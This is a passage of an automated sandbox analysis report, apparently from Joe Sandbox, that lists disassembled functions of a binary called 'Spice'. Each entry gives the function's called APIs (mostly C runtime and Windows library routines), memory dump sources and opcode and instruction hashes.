Instruction Fuzzy Hash: 56F0C875A0421EA6CF20BA98ED15ADE7BEC9F01314F10145AFD14F62D2DFB18B80E6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E9581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9584C
__lock_file.LIBCMT ref: 00E9586D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 5a00e72df405902dcc7918b293242bd04dcccdf15f408299a9fae6bd4b821131
Instruction ID: dd7900f18a8487615a76203be5bf6f5c47f1375fdb1c94cfd4c95355e96aa652
Opcode Fuzzy Hash: 5a00e72df405902dcc7918b293242bd04dcccdf15f408299a9fae6bd4b821131
Instruction Fuzzy Hash: 45016772C01749EBCF22AF65DD0599F7BA1AF81360F185126F8247B1B1D7318A21DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E955C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

__lock_file.LIBCMT ref: 00E9560B

Part of subcall function 00E96E3E: __lock.LIBCMT ref: 00E96E61

__fclose_nolock.LIBCMT ref: 00E95616

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: b6409fd547b415eba18ea1827598c3a184d9d1e654e3ec1626d25cd6033ff0f2
Instruction ID: 1ca63a1510385800e03e61e7e411132aedf02885584c1cf1e3ab4d41706e9c48
Opcode Fuzzy Hash: b6409fd547b415eba18ea1827598c3a184d9d1e654e3ec1626d25cd6033ff0f2
Instruction Fuzzy Hash: 97F0B472901B059BDF127B759902B6E77E16F41334F16A20AB824BB1D2CB7C8A419F51

Uniqueness

Uniqueness Score: -1.00%

Function 00E95E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E95EB4
__ftell_nolock.LIBCMT ref: 00E95EBF

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 9cba867a6731c039d7bccbc3b9b36c1e73ebf3e17f67c03b8439822c86a37b4c
Instruction ID: 25a884b9e23af74ba584591a1462082b81c7f81dd7692c7a8b2df0e70a5d2c9b
Opcode Fuzzy Hash: 9cba867a6731c039d7bccbc3b9b36c1e73ebf3e17f67c03b8439822c86a37b4c
Instruction Fuzzy Hash: 17F0A7329116199ADF01BB74890275E72D06F12331F256307B424BB1E2CF788B419B55

Uniqueness

Uniqueness Score: -1.00%

Function 00E85AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E85AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E85B1F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 8718ca242f7f837690d814c128a8be35f713a52bf58788c470fb6eb5a8d728fe
Instruction ID: a1aa6aa437039f528a1bfa59535172f7f74fe8e999e0ffc941b0e1b0df988c21
Opcode Fuzzy Hash: 8718ca242f7f837690d814c128a8be35f713a52bf58788c470fb6eb5a8d728fe
Instruction Fuzzy Hash: E9F0A7B180830C9FD7A2DB64DC45796B7BC970030CF0001E9AA4C96292DB714B88DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00EEC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 8d7758e916cc7fd8d46818d075ee4024b1007532627e0fd0101387739a97c728
Instruction ID: cc49242e45104b190f7931bda1e943593eb916e6bfa08f6569454ce88b75e63c
Opcode Fuzzy Hash: 8d7758e916cc7fd8d46818d075ee4024b1007532627e0fd0101387739a97c728
Instruction Fuzzy Hash: 6DB17034A0014ADFCB14EFA9C851DEEB7B5FF48714F20915AF919B7291EB70A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E7A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
Instruction ID: b5ef4bfeb7c99eda196fe10c86ef7d39d2c6ff894c052e553f5206aeff005b5e
Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
Instruction Fuzzy Hash: A061FB70600206DFDB14DF60D881ABEB7E5EF84304F19907DEA1AAB281E770ED90CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E8343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E8351A

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
Instruction ID: 4e72d9f2cd18897922f005d0820d8e09af13875fd55ce9300cda9cbb133f6d40
Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
Instruction Fuzzy Hash: 3831C175204A02DFC725EF28D480A61F7E0FF09B10714D569E89EAB7A1D730ED81CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EAE2EA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 137691e64577d1487759f68713d3efdc686b0c3c7b6b8a179bb4bdc07074823e
Instruction ID: f068156a2f8dc101259c979de84c3381bf45966a319880b82efc8be1f69d914c
Opcode Fuzzy Hash: 137691e64577d1487759f68713d3efdc686b0c3c7b6b8a179bb4bdc07074823e
Instruction Fuzzy Hash: 9A411874508741CFDB24DF14C484B1ABBE1BF45308F1999ACE899AB362C772EC85CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E849C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E84B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E84B63

Part of subcall function 00E9547B: __wfsopen.LIBCMT ref: 00E95486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E827AF,?,00000001), ref: 00E849F4

Part of subcall function 00E84ADE: FreeLibrary.KERNEL32(00000000), ref: 00E84B18

Part of subcall function 00E848B0: _memmove.LIBCMT ref: 00E848FA

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e179facd24d913de0eecb9269142cba628854e6dd746da6253d8798a2f246fc3
Instruction ID: 85074be8fc1b19636407c621a87af64b815cbfcc2acd9dfcff749ef7ab1a875f
Opcode Fuzzy Hash: e179facd24d913de0eecb9269142cba628854e6dd746da6253d8798a2f246fc3
Instruction Fuzzy Hash: 7011017265021AABCB18FB60CC02FAE77E9DF40701F10946DF54DBA1C1FE758A01AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00E81BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E81BFE

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
Instruction ID: 92684eb4a7c4d4d363ead318add0c1a6967359f3058bad4dfcf37253d68a0f52
Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
Instruction Fuzzy Hash: CE114C76204601DFCB24DF28D581916F7E9FF49354B20986EE49EDB261E732E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EAE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00EAE3CE

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ee2257c5a53d1f7d36a54657b59fbde584cce705b9be39a908738f9df03cff69
Instruction ID: 6f10ceaa91056dbb255c8743985478c83702f23647e3a119c7320eb4bb6a4a38
Opcode Fuzzy Hash: ee2257c5a53d1f7d36a54657b59fbde584cce705b9be39a908738f9df03cff69
Instruction Fuzzy Hash: C1211374508741DFCB24DF14C444B1ABBE0BF89308F059968F89A6B322D731E849DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E81A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E81A77

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction ID: 602a9121e21446f184543e79847c4422cd9a6440835fe820df8ff7f73d229fb8
Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction Fuzzy Hash: 9F01F9722017016EDB246F38DC02F67BBDCDB447A0F50956EF62EDA1D1EA31E5408790

Uniqueness

Uniqueness Score: -1.00%

Function 00EE495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00EE4998

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: d2b8e3f6f15f3afba8776166d6bad976418ac2622b81f64d8431e5ac155e9109
Instruction ID: 85b5c08cbecd0ef489dafef84c12b1d07ca39fbf75d18657544414b33260a36d
Opcode Fuzzy Hash: d2b8e3f6f15f3afba8776166d6bad976418ac2622b81f64d8431e5ac155e9109
Instruction Fuzzy Hash: 58F03175608109AFCB14FB65D846D9F77FCEF45720B005056F908AB2A1EE71AD41C760

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031

_memset.LIBCMT ref: 00ED7CB4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction ID: 4d9b7146cf42c1eb39dccb4b41bb62d5eafa935a249db0c77e5ad3e6a85a7205
Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction Fuzzy Hash: 4C01EF742082009FD721EF5CD941F4ABBE1AF59710F24949AF588AB3A2DB72A8018B91

Uniqueness

Uniqueness Score: -1.00%

Function 00EADC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00E90FE6: std::exception::exception.LIBCMT ref: 00E9101C
Part of subcall function 00E90FE6: __CxxThrowException@8.LIBCMT ref: 00E91031

_memmove.LIBCMT ref: 00EADC8B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction ID: d371c2d2f5eb8bfe171bd5b889395822a65fdb67d660f08b83fcf4139671f0e8
Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction Fuzzy Hash: 97F01DB4604201DFDB11DF68C981E15BBE1FF1A714B24949CE1899F3A2E733E911CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E84A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00E84AA4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 9aee71fba35bf14b5deafcb819e1618e1fff61961609cc7748d390e42ee522ea
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 07F085B6400208FFDF159F84DC00DEBBBB9EB89324F00419CF9086A210D272EA218BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E84A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00E827AF,?,00000001), ref: 00E84A63

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8f62748935e5db18de02230ae17f5eecdf5bd516d2933a2fddf9296dd614cfce
Instruction ID: 54e714cb54cef118da65fa5341c3974bad168e8e23b513bb9baefecfbbf5af5d
Opcode Fuzzy Hash: 8f62748935e5db18de02230ae17f5eecdf5bd516d2933a2fddf9296dd614cfce
Instruction Fuzzy Hash: 3BF01CB1145706CFCB38AF64E490856BBF0FF14319310A9AEE1DE97651D7319944DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00E84AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00E84AD0

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 4fc347ff6eb85dda57c511fe8e85519a20446ea872d3d9f395168cce78a166ae
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: CDF0F8B240020DFFDF05DF90C941EAABB79FB54314F209589FD199A252D336DA21AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00EB0A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00EB0A84

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e7102c16fd033f45a7c7e7dbf54e8c72b590eee8b8bb4d8f1e4baf1fd7619fb
Instruction ID: 183b1d706393f9d7956f82bbb5b19472520130d2099af7a32175d1f9433494ae
Opcode Fuzzy Hash: 1e7102c16fd033f45a7c7e7dbf54e8c72b590eee8b8bb4d8f1e4baf1fd7619fb
Instruction Fuzzy Hash: FEE02BB17083469EEB309B649404BA3FFD4EB00315F10A46ED499A1241E77668949BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E909C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E909E4

Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
